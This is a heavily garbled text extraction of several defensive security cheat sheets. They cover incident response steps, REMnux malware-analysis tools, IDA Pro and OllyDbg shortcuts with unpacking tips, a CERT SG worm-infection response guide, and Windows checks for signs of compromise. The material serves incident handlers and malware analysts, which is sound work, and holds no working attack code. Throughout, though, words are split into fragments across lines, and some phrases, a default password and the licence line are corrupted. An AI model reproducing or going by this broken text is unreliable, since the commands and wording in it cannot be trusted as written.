e next
steps for responding
to th
is incident?
(W
ho
will do
what a
nd
when?)
Key
Incident Response
Steps
1.
Preparation: G
ather and
learn
the
necessary
tools,
become
familiar with
your environment.
2.
Identification: D
etect
the
incident,
determ
ine
its
scope, and
involve
the
appropriate
parties.
3.
Containment:
Contain
the
incident to
minim
ize
its
effect
on
neighboring
IT resources.
4.
Eradication: Eliminate
compromise
artifacts,
if
necessary, on
the
path
to recovery.
5.
Recovery: R
estore
the
system
to norm
al
operations,
possibly
via
reinstall
or backup.
6.
Wrap
‐up: D
ocument the
incident’s details,
retail
collected
data, and
discuss
lessons learned.
Additional Incident Response
References
Incident S
urvey
Cheat S
heet for Server Administrators
http://zeltser.com/netw
ork
‐os‐security/security
‐incident‐survey
‐cheat‐sheet.htm
l
Windows Intrusion
Discovery
Cheat S
heet
http://sans.org/resources/winsacheatsheet.pdf
Checking
Windows for Signs of C
ompromise
http://w
ww.ucl.ac.uk/cert/w
in_intrusion.pdf
Linux Intrusion
Discovery
Cheat S
heet
http://sans.org/resources/linsacheatsheet.pdf
Checking
Unix/Linux for S
igns of C
ompromise
http://w
ww.ucl.ac.uk/cert/nix_intrusion.pdf
Authored
by
Lenny
Zeltser,
who
leads a
security
consulting
team
at S
AVVIS, and
teaches malware
analysis at S
ANS
Institute. Special thanks for feedback
to Ja
ck M
cCarthy and
Patrick
Nolan.
Creative
Commons v3
“Attribution” License
for this
cheat sheet v. 1.2. M
ore
cheat sheets?
93
RE
MN
UX
US
AG
E T
IPS
FO
R M
ALW
AR
E
AN
ALY
SIS
ON
LIN
UX
Th
is c
he
at
she
et
ou
tlin
es
the
to
ols
an
d c
om
ma
nd
s fo
r
an
aly
zin
g m
alic
iou
s so
ftw
are
on
RE
Mn
ux
Lin
ux
dis
tro
.
Ge
ttin
g S
tart
ed
wit
h R
EM
nu
x
Do
wn
loa
d R
EM
nu
x a
s a
vir
tua
l a
pp
lia
nce
or
inst
all
th
e
dis
tro
on
an
exi
stin
g c
om
pa
tib
le s
yst
em
, su
ch a
s S
IFT
.
Log
in
to t
he
RE
Mn
ux
vir
tua
l a
pp
lia
nce
as
the
use
r
reux
, d
efau
lt pa
ssor
d al
are
. U
se a
pt-
ge
t to
in
sta
ll a
dd
itio
na
l so
ftw
are
pa
cka
ge
s if
yo
ur
syst
em
is
con
ne
cte
d t
o t
he
In
tern
et.
Ru
n t
he
up
da
te-r
em
nu
x co
mm
an
d t
o u
pg
rad
e
RE
Mn
ux
an
d u
pd
ate
its
so
ftw
are
.
Sw
itch
ke
yb
oa
rd l
ay
ou
t b
y c
lick
ing
th
e k
ey
bo
ard
ico
n
in t
he
bo
tto
m r
igh
t co
rne
r o
f th
e R
EM
nu
x d
esk
top
.
On
VM
wa
re,
inst
all
VM
wa
re T
oo
ls u
sin
g i
nst
all
-
vm
wa
re-t
oo
ls t
o a
dju
st t
he
scr
ee
n s
ize
.
Ge
ne
ral
Co
mm
an
ds o
n R
EM
nu
x
Sh
ut
do
wn
th
e s
yst
em
sh
utd
ow
n
Re
bo
ot
the
sy
ste
m
reb
oo
t
Sw
itch
to
a r
oo
t sh
ell
su
do
-s
Re
ne
w D
HC
P le
ase
re
ne
w-d
hcp
Se
e c
urr
en
t IP
ad
dre
ss
my
ip
Ed
it a
te
xt f
ile
sc
ite
fil
e
Vie
w a
n i
ma
ge
fil
e
feh
fil
e
Sta
rt w
eb
se
rve
r h
ttp
d s
tart
Sta
rt S
SH
se
rve
r ss
hd
sta
rt
Sta
tic
all
y E
xa
min
e F
ile
s
Insp
ect
fil
e p
rop
ert
ies
usi
ng
pe
sca
nn
er,
pe
str,
py
ew
,
rea
dp
e,
pe
du
mp
, p
efr
am
e,
sig
nsr
ch,
rea
dp
e.p
y.
Inv
est
iga
te b
ina
ry f
ile
s in
-de
pth
usi
ng
bo
kk
en
, v
ivb
in,
ud
cli,
RA
TD
eco
de
rs,
rad
are
2,
ya
ra,
wxH
exE
dit
or.
De
ob
fusc
ate
co
nte
nts
wit
h x
ors
ea
rch
, u
nxo
r.p
y,
Ba
lbu
zard
, N
oM
ore
XO
R.p
y,
bru
texo
r.p
y,
xort
oo
l.
Exa
min
e m
em
ory
sn
ap
sho
ts u
sin
g R
ek
all
, V
ola
tili
ty.
Ass
ess
pa
cke
d f
ile
s u
sin
g d
en
sity
sco
ut,
by
teh
ist,
pa
cke
rid
, u
px.
Ext
ract
an
d c
arv
e f
ile
co
nte
nts
usi
ng
ha
cho
ir-s
ub
file
,
bu
lk_
ext
ract
or,
sca
lpe
l, f
ore
mo
st.
Sca
n f
ile
s fo
r m
alw
are
sig
na
ture
s u
sin
g c
lam
sca
n
aft
er
refr
esh
ing
sig
na
ture
s w
ith
fre
shcl
am
.
Exa
min
e a
nd
tra
ck m
ult
iple
ma
lwa
re s
am
ple
s w
ith
ma
s, v
ipe
r, m
alt
rie
ve
, R
ag
pic
ke
r.
Wo
rk w
ith
fil
e h
ash
es
usi
ng
nsr
llo
ok
up
, A
uto
ma
ter,
ha
sh_
id,
ssd
ee
p,
tota
lha
sh,
vir
ust
ota
l-se
arc
h,
vt.
De
fin
e s
ign
atu
res
wit
h y
ara
Ge
ne
rato
r.p
y,
au
toru
le.p
y,
IOC
ext
ract
or.
py
, ru
le-e
dit
or.
Ha
nd
le N
etw
ork
In
tera
cti
on
s
An
aly
ze n
etw
ork
tra
ffic
wit
h w
ire
sha
rk,
ng
rep
, tc
pic
k,
tcp
xtra
ct,
tcp
flo
w,
tcp
du
mp
.
Inte
rce
pt
all
la
bo
rato
ry t
raff
ic d
est
ine
d f
or
IP
ad
dre
sse
s u
sin
g a
cce
pt-
all
-ip
s.
An
aly
ze w
eb
tra
ffic
wit
h b
urp
suit
e,
mit
mp
roxy
,
Ca
pT
ipp
er,
Ne
two
rkM
ine
r.
Imp
lem
en
t co
mm
on
ne
two
rk s
erv
ice
s u
sin
g f
ak
ed
ns,
fak
esm
tp,
ine
tsim
, ir
cd s
tart
, h
ttp
d s
tart
. E
xa
min
e B
row
se
r M
alw
are
De
ob
fusc
ate
Ja
va
Scr
ipt
wit
h S
pid
erM
on
ke
y (
js),
d8
,
rhin
o-d
eb
ug
ge
r a
nd
Fir
eb
ug
.
De
fin
e J
ava
Scr
ipt
ob
ject
s fo
r S
pid
erM
on
ke
y u
sin
g
/usr
/sh
are
/re
mn
ux/
ob
ject
s.js
.
Cle
an
up
Ja
va
Scr
ipt
wit
h j
s-b
ea
uti
fy.
Re
trie
ve
we
b p
ag
es
wit
h w
ge
t a
nd
cu
rl.
Exa
min
e m
ali
cio
us
Fla
sh f
ile
s w
ith
sw
fdu
mp
, fl
are
,
RA
BC
DA
sm,
xxxs
wf.
py
, e
xtra
ct_
swf.
An
aly
ze J
ava
ma
lwa
re u
sin
g i
dx_
pa
rse
r.p
y,
cfr,
ja
d,
jd-
gu
i, J
av
ass
ist.
Insp
ect
ma
lici
ou
s w
eb
site
s a
nd
do
ma
ins
usi
ng
th
ug
,
Au
tom
ate
r, p
dn
sto
ol.
py,
pa
ssiv
e.p
y.
Ex
am
ine
Do
cu
me
nt
Fil
es
An
aly
ze s
usp
icio
us
Mic
roso
ft O
ffic
e d
ocu
me
nts
wit
h
off
ice
pa
rse
r.p
y,
ole
too
ls,
lib
ole
cf,
ole
du
mp
.py
.
Exa
min
e P
DF
s u
sin
g p
dfi
d,
pd
fwa
lke
r, p
df-
pa
rse
r,
pd
fde
com
pre
ss,
pd
fxra
y_
lite
, p
ye
w,
pe
ep
df.
Ext
ract
Ja
va
Scr
ipt
or
SW
Fs
fro
m P
DF
s u
sin
g
pd
fext
ract
, p
df.
py
ad
swf_
ma
sta
h.
Exa
min
e s
he
llco
de
usi
ng
sh
ell
cod
e2
exe
.py
, sc
test
,
dis
m-t
his
, u
nic
od
e2
he
x-e
sca
pe
d,
m2
elf
, d
ism
-th
is.p
y.
Inv
esti
ga
te L
inu
x M
alw
are
Dis
ass
em
ble
an
d d
eb
ug
bin
ari
es
usi
ng
bo
kke
n,
viv
bin
,
ed
b,
gd
b,
ud
cli,
ra
da
re2
, o
bjd
um
p.
Exa
min
e t
he
syst
em
du
rin
g b
eh
av
iora
l a
na
lysi
s w
ith
sysd
ig,
un
hid
e,
stra
ce,
ltra
ce.
Exa
min
e m
em
ory
sn
ap
sho
ts u
sin
g R
ek
all
, V
ola
tili
ty.
De
cod
e A
nd
roid
ma
lwa
re u
sin
g A
nd
row
arn
,
An
dro
Gu
ard
.
Ex
am
ine
Me
mo
ry U
sin
g V
ola
tili
ty
De
term
ine
pro
file
k
db
gsc
an
, im
ag
ein
fo
Sp
ot
hid
de
n p
roce
sse
s p
sxvi
ew
List
all
pro
cess
es
psl
ist,
pss
can
Sh
ow
a r
eg
istr
y k
ey
pri
ntk
ey
-K
ke
y
Ext
ract
pro
cess
im
ag
e
pro
cdu
mp
Ext
ract
pro
cess
me
mo
ry
me
md
um
p,
va
dd
um
p
List
op
en
ha
nd
les,
fil
es,
DLL
s a
nd
mu
tan
t o
bje
cts
ha
nd
les,
fil
esc
an
, d
llli
st,
mu
tan
tsca
n
List
se
rvic
es,
dri
ve
rs a
nd
ke
rne
l m
od
ule
s sv
csca
n,
dri
vers
can
,
mo
du
les,
mo
dsc
an
Vie
w n
etw
ork
act
ivit
ies
con
nsc
an
, co
nn
ect
ion
s,
sock
ets
, so
cksc
an
, n
ets
can
Vie
w a
ctiv
ity
tim
eli
ne
ti
me
lin
er,
ev
tlo
gs
Fin
d a
nd
ext
ract
ma
lwa
re
ma
lfin
d,
ap
iho
ok
s
Ad
dit
ion
al
Re
so
urc
es
RE
Mn
ux
Do
cum
en
tati
on
Re
ve
rse
-En
gin
ee
rin
g M
alw
are
Ch
ea
t S
he
et
An
aly
zin
g M
alici
ou
s D
ocu
me
nts
Ch
ea
t S
he
et
SA
NS
Re
ve
rse
-En
gin
ee
rin
g M
alw
are
Co
urs
e
Au
tho
red
by
Le
nn
y Z
elt
ser
for
RE
Mn
ux
v6
. Le
nn
y w
rite
s a
se
curi
ty b
log
at
zelt
ser.
com
an
d i
s a
ctiv
e o
n T
wit
ter
as
@le
nn
yze
ltse
r. M
an
y R
EM
nu
x to
ols
an
d t
ech
niq
ue
s a
re d
iscu
sse
d i
n t
he
Re
ve
rse
-E
ng
ine
eri
ng
Ma
lwa
re (
RE
M)
cou
rse
, w
hic
h L
en
ny
te
ach
es
at
SA
NS
In
stit
ute
—se
e L
ea
rnR
EM
.co
m.
Th
is c
he
at
she
et
is d
istr
ibu
ted
acc
ord
ing
to
th
e C
reat
ie
Coo
s 3
Attr
iut
io Li
ese
.
94
REVERSE
‐ENGINEERING
MALW
ARE
The
shortcuts
and
tips behind
this
cheat sheet a
re
covered
in Lenny
Zeltser’s SANS
Institute
course
SEC610: R
everse
‐Engineering
Malware; for d
etails
see
http://zeltser.com/reverse
‐malware.
General A
pproach
1.
Set u
p a
controlled, isolated
laboratory
in which
to
examine
the
malware
specimen.
2.
Perform
behavioral analysis to
examine
the
specimen’s
interactions with
its environment.
3.
Perform
static code
analysis to
further
understand
the
specimen’s
inner‐workings.
4.
Perform
dynamic
code
analysis to
understand
the
more
difficult
aspects of the
code.
5.
If necessary, unpack
the
specimen.
6.
Repeat steps 2, 3, and
4 (o
rder may
vary) u
ntil
analysis objectives are
met.
7.
Document findings and
clean
‐up
the
laboratory
for future
analysis.
Behavioral A
nalysis
Be
ready
to revert
to good
state
via
dd, V
Mware
snapshots, CoreRestore, G
host, SteadyState, etc.
Monitor local (Process
Monitor,
Process
Explorer)
and
netw
ork
(Wireshark, tcpdump) interactions.
Detect
major local changes (RegShot,
Autoruns).
Redirect
netw
ork
traffic
(hosts file, D
NS, H
oneyd).
Activate
services (IRC, H
TTP, SMTP, etc.)
as needed
to
evoke
new
behavior from
the
specimen.
IDA
Pro
for Static
Code
Analysis
Text
search
Alt+T
Show
strings window
Shift+F12
Show
operand
as hex value
Q
Insert
comment
:
Follow
jump
or call
in view
Enter
Return
to previous view
Esc
Go
to next
view
Ctrl+Enter
Show
names window
Shift+F4
Display
function’s
flow
chart
F12
Display
graph
of function
calls
Ctrl+F12
Go
to program’s
entry
point
Ctrl+E
Go
to specific address
G
Rename
a variable
or function
N
Show
listing
of n
ames
Ctrl+L
Display
listing
of segments
Ctrl+S
Show
cross
‐references
to selected
function
Select f
unction n
ame
» C
trl+X
Show
stack
of current function
Ctrl+K
OllyDbg
for Dynamic
Code
Analysis
Step
into
instruction
F7
Step
over instruction
F8
Execute
till
next
breakpoint
F9
Execute
till
next
return
Ctrl+F9
Show
previous/next
executed
instruction
‐ / +
Return
to previous view
*
Show
memory
map
Alt+M
Follow
expression
in view
Ctrl+G
Insert
comment
;
Follow
jump
or call
in view
Enter
Show
listing
of n
ames
Ctrl+N
New
binary
search
Ctrl+B
Next
binary
search
result
Ctrl+L
Show
listing
of software
breakpoints
Alt+B
Assemble
instruction
in
place
of selected
one
Select i
nstruction »
Spacebar
Edit
data
in m
emory
or
instruction
opcode
Select d
ata o
r
instruction »
Ctrl+E
Show
SEH
chain
View »
SEH c
hain
Show
patches
Ctrl+P
Bypassing
Malw
are
Defenses
To
try
unpacking
quickly, infect
the
system
and
dump
from
memory
via
LordPE
or O
llyDump.
For more
surgical unpacking, locate
the
Original
Entry
Point (OEP) after the
unpacker executes.
If cannot u
npack
cleanly, examine
the
packed
specimen
via
dynamic
code
analysis while
it ru
ns.
When
unpacking
in OllyDbg, try
SFX
(bytewise) and
OllyDump’s
“Find
OEP
by
Section
Hop”.
Conceal O
llyDbg
via
HideOD
and
OllyAdvanced.
A JM
P or CALL
to EAX
may indicate
the
OEP, possibly
preceded
by POPA
or POPAD.
Look
out for tricky jumps via
SEH, R
ET, CALL, etc.
If th
e packer u
ses SEH, anticipate
OEP
by
tracking
stack
areas used
to store
the
packers’ handlers.
Decode
protected
data
by examining
results of the
decoding
function
via
dynamic
code
analysis.
Correct
PE
header problems with
XPELister,
LordPE,
ImpREC, PEiD, etc.
To
get closer to
OEP, try
breaking
on
unpacker’s calls
to LoadLibraryA
or GetProcAddress.
Common
x86
Registers
and
Uses
EAX
Addition, m
ultiplication, function
results
ECX
Counter
EBP
Base
for referencing
function
arguments
(EBP+value) and
local variables (EBP
‐value)
ESP
Points
to th
e current “top” of the
stack;
changes via
PUSH, POP, and
others
EIP
Points
to th
e next
instruction
EFLAGS
Contains flags that store
outcomes of
computations (e.g.,
Zero
and
Carry
flags)
Authored
by Lenny
Zeltser,
who
leads the
security
consulting
practice
at S
avvis
and
teaches at S
ANS
Institute. You
can
find
him
at h
ttp://twitter.com/lennyzeltser.
See
Lenny’s
other cheat sheets
at h
ttp://zeltser.com/cheat‐sheets. Creative
Commons v3
“Attribution” License
for this
cheat sheet version
1.5.
95
Prep
arat
ion
Iden
tific
atio
n C
onta
inm
ent
■■ D
efin
e ac
tors
, fo
r ea
ch e
ntity
, w
ho w
ill be
in
volv
ed
into
th
e cr
isis
ce
ll.
Thes
e ac
tors
sh
ould
be
docu
men
ted
in a
con
tact
lis
t ke
pt
perm
anen
tly u
p to
dat
e.
■■ M
ake
sure
th
at
anal
ysis
to
ols
are
up,
func
tiona
l (An
tiviru
s, ID
S, l
ogs
anal
yser
s), n
ot
com
prom
ised
, and
up
to d
ate.
■■
Mak
e su
re t
o ha
ve a
rchi
tect
ure
map
of
your
ne
twor
ks.
■■ M
ake
sure
that
an
up to
dat
e in
vent
ory
of th
e as
sets
is a
vaila
ble.
■■
Per
form
a
cont
inuo
us
secu
rity
wat
ch
and
info
rm t
he p
eopl
e in
cha
rge
of s
ecur
ity a
bout
th
e th
reat
tren
ds.
Det
ect t
he in
fect
ion
Info
rmat
ion
com
ing
from
sev
eral
sou
rces
sho
uld
be
gath
ered
and
ana
lyze
d:
■■ A
ntiv
irus
logs
, ■■
Intru
sion
Det
ectio
n S
yste
ms,
■■
Sus
pici
ous
conn
ectio
n at
tem
pts
on s
erve
rs,
■■ H
igh
amou
nt o
f acc
ount
s lo
cked
, ■■
Susp
icio
us n
etw
ork
traffi
c,
■■ S
uspi
ciou
s co
nnec
tion
atte
mpt
s in
fire
wal
ls,
■■ H
igh
incr
ease
of s
uppo
rt ca
lls,
■■ H
igh
load
or s
yste
m fr
eeze
, ■■
Hig
h vo
lum
es o
f e-m
ail s
ent
If
one
or s
ever
al o
f th
ese
sym
ptom
s ha
ve b
een
spot
ted,
the
acto
rs d
efin
ed in
the
“pre
para
tion”
ste
p w
ill g
et i
n to
uch
and
if ne
cess
ary,
cre
ate
a cr
isis
ce
ll.
Iden
tify
the
infe
ctio
n
Ana
lyze
the
sym
ptom
s to
ide
ntify
the
wor
m,
its
prop
agat
ion
vect
ors
and
coun
term
easu
res.
Le
ads
can
be fo
und
from
: ■■
CE
RT’
s bu
lletin
s;
■■ E
xter
nal
supp
ort
cont
acts
(a
ntiv
irus
com
pani
es, e
tc.)
; ■■
Sec
urity
w
ebsi
tes
(Sec
unia
, S
ecur
ityFo
cus
etc.
) N
otify
Chi
ef In
form
atio
n S
ecur
ity O
ffice
r. C
onta
ct y
our C
ER
T if
requ
ired.
A
sses
s th
e pe
rimet
er o
f the
infe
ctio
n
Def
ine
the
boun
darie
s of
the
infe
ctio
n (i.
e.:
glob
al
infe
ctio
n, b
ound
ed to
a s
ubsi
diar
y, e
tc.).
If
poss
ible
, id
entif
y th
e bu
sine
ss i
mpa
ct o
f th
e in
fect
ion.
The
follo
win
g ac
tions
sho
uld
be p
erfo
rmed
and
m
onito
red
by th
e cr
isis
man
agem
ent c
ell:
11 ..
Dis
conn
ect
the
infe
cted
ar
ea
from
th
e In
tern
et.
22 ..
Isol
ate
the
infe
cted
are
a. D
isco
nnec
t it
from
an
y ne
twor
k.
33 ..
If bu
sine
ss-c
ritic
al
traffi
c ca
nnot
be
di
scon
nect
ed,
allo
w i
t af
ter
ensu
ring
that
it
cann
ot b
e an
infe
ctio
n ve
ctor
or
find
valid
ated
ci
rcum
vent
ions
tech
niqu
es.
44 ..
Neu
traliz
e th
e pr
opag
atio
n ve
ctor
s.
A
prop
agat
ion
vect
or
can
be
anyt
hing
fro
m
netw
ork
traffi
c to
so
ftwar
e fla
w.
Rel
evan
t co
unte
rmea
sure
s ha
ve t
o be
app
lied
(pat
ch,
traffi
c bl
ocki
ng, d
isab
le d
evic
es, e
tc.)
Fo
r ex
ampl
e, t
he f
ollo
win
g te
chni
ques
can
be
used
: -
Pat
ch d
eplo
ymen
t too
ls (W
SU
S),
- W
indo
ws
GPO
, -
Fire
wal
l rul
es,
- O
pera
tiona
l pro
cedu
res.
55 ..
R
epea
t ste
ps 2
to 4
on
each
sub
-are
a of
the
infe
cted
are
a un
til th
e w
orm
sto
ps s
prea
ding
. If
poss
ible
, m
onito
r th
e in
fect
ion
usin
g an
alys
is
tool
s (a
ntiv
irus
cons
ole,
ser
ver
logs
, su
ppor
t ca
lls).
The
spre
adin
g of
the
wor
m m
ust b
e m
onito
red.
M
obile
dev
ices
Mak
e su
re t
hat
no la
ptop
, P
DA
or
mob
ile s
tora
ge
can
be u
sed
as a
pro
paga
tion
vect
or b
y th
e w
orm
. If
poss
ible
, blo
ck a
ll th
eir c
onne
ctio
ns.
Ask
end
-use
rs to
follo
w d
irect
ives
pre
cise
ly.
1122
33
8296
Rem
edia
tion
Rec
over
y
Afte
rmat
h
In
cide
nt R
espo
nse
Met
hodo
logy
IRM
#1
W
orm
Infe
ctio
n R
espo
nse
Gui
delin
es to
han
dle
info
rmat
ion
syst
em W
orm
infe
ctio
ns
____
____
____
____
____
____
____
____
____
____
____
____
___
IRM
Aut
hor:
CE
RT
SG
/ Vin
cent
Fer
ran-
Laco
me
IRM
ver
sion
: 1.2
E
-Mai
l: ce
rt.sg
@so
cgen
.com
W
eb: h
ttp://
cert.
soci
eteg
ener
ale.
com
Tw
itter
: @C
ertS
G
Abs
trac
t
Inci
dent
han
dlin
g st
eps
Iden
tify
Iden
tify
tool
s an
d re
med
iatio
n m
etho
ds.
The
follo
win
g re
sour
ces
shou
ld b
e co
nsid
ered
: - V
endo
r fix
es (M
icro
soft,
Ora
cle,
etc
.) - A
ntiv
irus
sign
atur
e da
taba
se
- Ext
erna
l sup
port
cont
acts
- S
ecur
ity w
ebsi
tes
D
efin
e a
disi
nfec
tion
proc
ess.
The
pro
cess
has
to
be v
alid
ated
by
an e
xter
nal
stru
ctur
e, l
ike
your
C
ER
T fo
r exa
mpl
e.
Test
Test
the
disi
nfec
tion
proc
ess
and
mak
e su
re th
at it
pr
oper
ly w
orks
with
out d
amag
ing
any
serv
ice.
D
eplo
y
Dep
loy
the
disi
nfec
tion
tool
s. S
ever
al o
ptio
ns c
an
be u
sed:
- W
indo
ws
WSU
S
- G
PO
-
Ant
iviru
s si
gnat
ure
depl
oym
ent
- M
anua
l dis
infe
ctio
n W
arni
ng:
som
e w
orm
s ca
n bl
ock
som
e of
th
e re
med
iatio
n de
ploy
men
t m
etho
ds.
If so
, a
wor
karo
und
has
to b
e fo
und.
R
emed
iatio
n pr
ogre
ss s
houl
d be
mon
itore
d by
the
cr
isis
cel
l.
Ver
ify a
ll pr
evio
us s
teps
hav
e be
en d
one
corr
ectly
an
d ge
t a
man
agem
ent
appr
oval
bef
ore
follo
win
g ne
xt s
teps
. 11 ..
R
eope
n th
e ne
twor
k tra
ffic
that
was
use
d as
a
prop
agat
ion
met
hod
by th
e w
orm
. 22 ..
R
econ
nect
sub
-are
as to
geth
er
33 ..
Rec
onne
ct th
e m
obile
lapt
ops
to th
e ar
ea
44 ..
Rec
onne
ct th
e ar
ea to
you
r loc
al n
etw
ork
55 ..
Rec
onne
ct th
e ar
ea to
the
Inte
rnet
A
ll of
the
se s
teps
sha
ll be
mad
e in
a s
tep-
by-s
tep
man
ner
and
a te
chni
cal
mon
itorin
g sh
all
be
enfo
rced
by
the
cris
is te
am.
Rep
ort
A
cris
is
repo
rt sh
ould
be
w
ritte
n an
d m
ade
avai
labl
e to
al
l of
th
e ac
tors
of
th
e cr
isis
m
anag
emen
t cel
l. Th
e fo
llow
ing
them
es s
houl
d be
des
crib
ed:
- In
itial
cau
se o
f the
infe
ctio
n -
Act
ions
and
tim
elin
es o
f ev
ery
impo
rtant
ev
ent
- W
hat w
ent r
ight
-
Wha
t wen
t wro
ng
- In
cide
nt c
ost
Cap
italiz
e
Act
ions
to im
prov
e th
e w
orm
infe
ctio
n m
anag
emen
t pr
oces
ses
shou
ld b
e de
fined
to
capi
taliz
e on
thi
s ex
perie
nce.
This
Inci
dent
Res
pons
e M
etho
dolo
gy is
a c
heat
she
et d
edic
ated
to
inci
dent
han
dler
s in
vest
igat
ing
a pr
ecis
e se
curit
y is
sue.
W
ho s
houl
d us
e IR
M s
heet
s?
• A
dmin
istra
tors
•
Sec
urity
Ope
ratio
n C
ente
r •
CIS
Os
and
depu
ties
• C
ER
Ts (C
ompu
ter E
mer
genc
y R
espo
nse
Team
) R
emem
ber:
If y
ou fa
ce a
n in
cide
nt, f
ollo
w IR
M, t
ake
note
s an
d do
not
pan
ic. C
onta
ct y
our C
ERT
imm
edia
tely
if
n eed
ed.
6 st
eps
are
defin
ed to
han
dle
secu
rity
Inci
dent
s
P
repa
ratio
n: g
et re
ady
to h
andl
e th
e in
cide
nt
Iden
tific
atio
n: d
etec
t the
inci
dent
C
onta
inm
ent:
limit
the
impa
ct o
f the
inci
dent
R
emed
iatio
n: re
mov
e th
e th
reat
R
ecov
ery:
reco
ver t
o a
norm
al s
tage
A
fterm
ath:
dra
w u
p an
d im
prov
e th
e pr
oces
s IR
M p
rovi
des
deta
iled
info
rmat
ion
for e
ach
step
.
Th
is d
ocum
ent i
s fo
r pub
lic u
se
4455 66
8397
Prep
arat
ion
Iden
tific
atio
n Id
entif
icat
ion
Iden
tific
atio
n
■■ A
phy
sica
l ac
cess
to
the
susp
icio
us s
yste
m s
houl
d be
of
fere
d to
the
fore
nsic
inve
stig
ator
.
■■ A
goo
d kn
owle
dge
of th
e us
ual n
etw
ork
and
loca
l act
iviti
es
of t
he c
ompu
ter
is a
ppre
ciat
ed.
You
shou
ld h
ave
a fil
e de
scrib
ing
the
usua
l po
rt ac
tivity
, to
hav
e a
com
paris
on
base
with
cur
rent
sta
te.
■■ A
goo
d kn
owle
dge
of t
he c
omm
on u
sed
serv
ices
and
in
stal
led
appl
icat
ions
is
need
ed.
Don
’t he
sita
te t
o as
k a
Win
dow
s E
xper
t for
his
ass
ista
nce,
whe
n ap
plic
able
.
Unu
sual
Acc
ount
s Lo
ok fo
r un
usua
l and
unk
now
n ac
coun
ts c
reat
ed, e
spec
ially
in
th
e A
dmin
istra
tors
gro
up :
C:\>
lusr
mgr
.msc
Unu
sual
File
s ■■
Look
for
unu
sual
big
file
s on
the
sto
rage
sup
port,
big
ger
than
10M
B s
eem
s to
be
reas
onab
le.
■■ Lo
ok f
or u
nusu
al f
iles
adde
d re
cent
ly i
n sy
stem
fol
ders
, es
peci
ally
C:\W
IND
OW
S\s
yste
m32
.
■■ Lo
ok fo
r file
s us
ing
the
“hid
den”
attr
ibut
e:
C:\>
dir
/S /A
:H
Unu
sual
Reg
istr
y En
trie
s Lo
ok
for
unus
ual
prog
ram
s la
unch
ed
at
boot
tim
e in
th
e W
indo
ws
regi
stry
, esp
ecia
lly:
HK
LM\S
oftw
are\
Mic
roso
ft\W
indo
ws\
Cur
rent
Ver
sion
\Run
H
KLM
\Sof
twar
e\M
icro
soft\
Win
dow
s\C
urre
ntV
ersi
on\R
unon
ce
HK
LM\S
oftw
are\
Mic
roso
ft\W
indo
ws\
Cur
rent
Ver
sion
\Run
once
Ex
HK
LM\S
oftw
are\
Mic
roso
ft\W
indo
ws
NT\
Cur
rent
Ver
sion
\W
inlo
gon
Che
ck fo
r the
sam
e en
tries
in H
KC
U
Unu
sual
Pro
cess
es a
nd S
ervi
ces
■■ C
heck
all
runn
ing
proc
esse
s fo
r un
usua
l/unk
now
n en
tries
, es
peci
ally
pr
oces
ses
with
us
erna
me
“SY
STE
M”
and
“AD
MIN
ISTR
ATO
R” :
C
:\> ta
skm
gr.e
xe
(or t
lisk,
task
list d
epen
ding
on
Win
dow
s re
leas
e)
■■ Lo
ok f
or u
nusu
al/u
nexp
ecte
d ne
twor
k se
rvic
es i
nsta
lled
and
star
ted:
C
:\> s
ervi
ces.
msc
C
:\> n
et s
tart
Not
e : a
goo
d kn
owle
dge
of th
e us
ual s
ervi
ces
is n
eede
d.
Unu
sual
Net
wor
k A
ctiv
ity
■■ C
heck
for
file
sha
res
and
verif
y ea
ch o
ne i
s lin
ked
to a
no
rmal
act
ivity
: C
:\> n
et v
iew
\\12
7.0.
0.1
■■ Lo
ok a
t the
ope
ned
sess
ions
on
the
mac
hine
: C
:\> n
et s
essi
on
■■ H
ave
a lo
ok a
t th
e sh
ares
the
mac
hine
has
ope
ned
with
ot
her s
yste
ms:
C
:\> n
et u
se
■■ C
heck
for a
ny s
uspi
ciou
s N
etbi
os c
onne
xion
: C
:\> n
btst
at –
S
1122
■■ Lo
ok f
or a
ny s
uspi
ciou
s ac
tivity
on
the
syst
em’s
TC
P/IP
po
rts:
C:\>
net
stat
–na
5
(-na
5 m
eans
set
s th
e re
fresh
inte
rval
to 5
sec
onds
) U
se –
o fla
g fo
r W
indo
ws
XP
/200
3 to
see
the
ow
ner
of e
ach
proc
ess:
C
:\> n
etst
at –
nao
5 ■■
Use
a s
niffe
r (W
iresh
ark,
tcpd
ump
etc.
) and
see
if th
ere
are
unus
ual a
ttem
pts
of c
onne
ctio
ns t
o or
fro
m r
emot
e sy
stem
s. I
f no
sus
pici
ous
activ
ity i
s w
itnes
sed,
do
use
the
sniff
er w
hile
br
owsi
ng
som
e se
nsiti
ve
web
site
s (b
anki
ng
web
site
fo
r ex
ampl
e) a
nd s
ee if
ther
e is
a p
artic
ular
net
wor
k ac
tivity
. N
ote:
A g
ood
know
ledg
e of
the
leg
itim
ate
netw
ork
activ
ity i
s ne
eded
.
Unu
sual
Aut
omat
ed T
asks
■■ Lo
ok a
t the
list
of s
ched
uled
task
s fo
r any
unu
sual
ent
ry:
C:\>
at
On
Win
dow
s 20
03/X
P :
C:\>
sch
task
s ■■
Als
o ch
eck
user
’s a
utos
tart
dire
ctor
ies:
C
:\Doc
umen
ts a
nd S
ettin
gs\u
ser\S
tart
Men
u\P
rogr
ams\
Sta
rtup
C:\W
inN
T\P
rofil
es\u
ser\S
tart
Men
u\P
rogr
ams\
Sta
rtup
Unu
sual
Log
Ent
ries
■■ W
atch
you
r log
file
s fo
r unu
sual
ent
ries:
C
:\> e
vent
vwr.m
sc
■■ S
earc
h fo
r eve
nts
like
the
follo
win
g :
“Eve
nt lo
g se
rvic
e w
as s
topp
ed”
“Win
dow
s Fi
le P
rote
ctio
n is
not
act
ive”
“T
he p
rote
cted
Sys
tem
file
<na
me>
was
not
res
tore
d to
its
or
igin
al”
“Tel
net S
ervi
ce h
as s
tarte
d su
cces
sful
ly”
■■ W
atch
you
r fir
ewal
l (if
any
) lo
g fil
es f
or s
uspe
ct a
ctiv
ity.
You
can
also
use
an
up-to
-dat
e an
tiviru
s to
iden
tify
mal
war
e on
th
e sy
stem
, but
be
awar
e th
at it
cou
ld d
estro
y ev
iden
ce.
In c
ase
noth
ing
susp
icio
us h
as b
een
foun
d, it
doe
sn’t
mea
n th
at
the
syst
em is
not
infe
cted
. A ro
otki
t cou
ld b
e ac
tive
for e
xam
ple,
di
stra
ctin
g al
l you
r too
ls fr
om g
ivin
g go
od re
sults
. Fu
rther
fore
nsic
inve
stig
atio
n ca
n be
don
e on
the
syst
em w
hile
it
is o
ff, if
the
syst
em is
stil
l sus
pici
ous.
The
idea
l cas
e is
to m
ake
a bi
t-by-
bit c
opy
of th
e ha
rd d
isk
